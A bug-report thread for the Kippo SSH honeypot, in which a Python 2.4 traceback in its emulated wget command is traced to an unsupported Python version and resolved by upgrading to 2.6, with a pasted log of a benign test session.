"/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/session.py", line 106, in dataReceived self.client.transport.write(data) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/ssh/session.py", line 157, in write self.proto.dataReceived(data) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/insults/insults.py", line 431, in dataReceived self.terminalProtocol.keystrokeReceived(ch, None) File "/opt/kippo/kippo/core/honeypot.py", line 350, in keystrokeReceived recvline.HistoricRecvLine.keystrokeReceived(self, keyID, modifier) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/recv...

ghost commented 10 years ago

From nick@silkey.org on March 04, 2011 19:36:20

...line.py", line 198, in keystrokeReceived m() File "/opt/kippo/kippo/core/honeypot.py", line 377, in handle_RETURN return recvline.RecvLine.handle_RETURN(self) File "/usr/lib/python2.4/site-packages/Twisted-10.2.0-py2.4-linux-i686.egg/twisted/conch/recvline.py", line 256, in handle_RETURN self.lineReceived(line) File "/opt/kippo/kippo/core/honeypot.py", line 344, in lineReceived self.cmdstack[-1].lineReceived(line) File "/opt/kippo/kippo/core/honeypot.py", line 73, in lineReceived self.runCommand() File "/opt/kippo/kippo/core/honeypot.py", line 126, in runCommand self.honeypot.call_command(cmdclass, *rargs) File "/opt/kippo/kippo/core/honeypot.py", line 370, in call_command obj.start() File "/opt/kippo/kippo/commands/wget.py", line 60, in start outfile = urldata.path.split('/')[-1] exceptions.AttributeError: 'tuple' object has no attribute 'path'

2011-03-04 22:25:04-0500 [SSHService ssh-connection on HoneyPotTransport,1,76.127.176.170] got global keepalive@openssh.com request

ghost commented 10 years ago

From desaster on March 05, 2011 07:32:15

Ah, sorry, these changes were in my unfinished work and not yet in svn.

However the actual reason why you're getting the traceback right now, is that you seem to be running an older version of python (python 2.4.3). The minimum required version for kippo is 2.5.

Kippo has been developed using 2.5+, and even if this particular problem is worked around, there will likely to be more version related problems.

Having tested kippo on CentOS 5, I understand it's a bit of a pain because there's no simple upgrade path to a newer python version. Check out my notes on CentOS installation here: https://code.google.com/p/kippo/wiki/KippoOnLinux I'll close this issue as WontFix, since the problem is not there on a newer python version, and I'm just too lazy to go back to python 2.4 :(

Status: WontFix

ghost commented 10 years ago

From nick@silkey.org on March 05, 2011 11:23:57

Bada-bing. Jumping to 2.6 resolved this issue:

2011-03-05 14:18:42-0500 [-] Log opened. 2011-03-05 14:18:42-0500 [-] twistd 10.2.0 (/usr/bin/python26 2.6.5) starting up. 2011-03-05 14:18:42-0500 [-] reactor class: twisted.internet.selectreactor.SelectReactor. 2011-03-05 14:18:42-0500 [-] kippo.core.honeypot.HoneyPotSSHFactory starting on 2222 2011-03-05 14:18:42-0500 [-] Starting factory <kippo.core.honeypot.HoneyPotSSHFactory instance at 0xa393fcc> 2011-03-05 14:18:51-0500 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 76.127.176.170:49853 (xx.xx.xx.xx:2222) [session: 0] 2011-03-05 14:18:51-0500 [HoneyPotTransport,0,76.127.176.170] Remote SSH version: SSH-2.0-OpenSSH_5.2 2011-03-05 14:18:51-0500 [HoneyPotTransport,0,76.127.176.170] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa 2011-03-05 14:18:51-0500 [HoneyPotTransport,0,76.127.176.170] outgoing: aes128-ctr hmac-md5 none 2011-03-05 14:18:51-0500 [HoneyPotTransport,0,76.127.176.170] incoming: aes128-ctr hmac-md5 none 2011-03-05 14:18:52-0500 [HoneyPotTransport,0,76.127.176.170] NEW KEYS 2011-03-05 14:18:52-0500 [HoneyPotTransport,0,76.127.176.170] starting service ssh-userauth 2011-03-05 14:18:52-0500 [SSHService ssh-userauth on HoneyPotTransport,0,76.127.176.170] root trying auth none 2011-03-05 14:18:52-0500 [SSHService ssh-userauth on HoneyPotTransport,0,76.127.176.170] root trying auth keyboard-interactive 2011-03-05 14:18:53-0500 [SSHService ssh-userauth on HoneyPotTransport,0,76.127.176.170] login attempt [root/123456] succeeded 2011-03-05 14:18:53-0500 [SSHService ssh-userauth on HoneyPotTransport,0,76.127.176.170] root authenticated with keyboard-interactive 2011-03-05 14:18:53-0500 [SSHService ssh-userauth on HoneyPotTransport,0,76.127.176.170] starting service ssh-connection 2011-03-05 14:18:53-0500 [SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] got channel session request 2011-03-05 14:18:53-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] channel open 2011-03-05 14:18:53-0500 [SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] got global no-more-sessions@openssh.com request 2011-03-05 14:18:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] unhandled request for auth-agent-req@openssh.com 2011-03-05 14:18:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] pty request: xterm-color (24, 80, 560, 336) 2011-03-05 14:18:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] Terminal size: 24 80 2011-03-05 14:18:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] getting shell 2011-03-05 14:18:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] Opening TTY log: log/tty/20110305-141854-57.log 2011-03-05 14:18:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] /etc/motd resolved into /etc/motd 2011-03-05 14:18:54-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] /var/run/motd resolved into /var/run/motd 2011-03-05 14:18:58-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] CMD: wget google.com 2011-03-05 14:18:58-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] Command found: wget google.com 2011-03-05 14:18:58-0500 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,76.127.176.170] Starting factory <HTTPProgressDownloader: http://google.com > 2011-03-05 14:18:58-0500 [HTTPPageDownloader,client] Updating realfile to dl/20110305141858_http___google_com 2011-03-05 14:18:58-0500 [HTTPPageDownloader,client] Stopping factory <HTTPProgressDownloader: http://www.google.com/ >

Thanks.

ghost commented 10 years ago

From nick@silkey.org on March 05, 2011 11:31:33

FYI: some fresh, more-efficient steps on bootstrapping CentOS for Kippo via EPEL. Consider putting this in the wiki? https://gist.github.com/856645 Ciao. Thanks for the fun toys.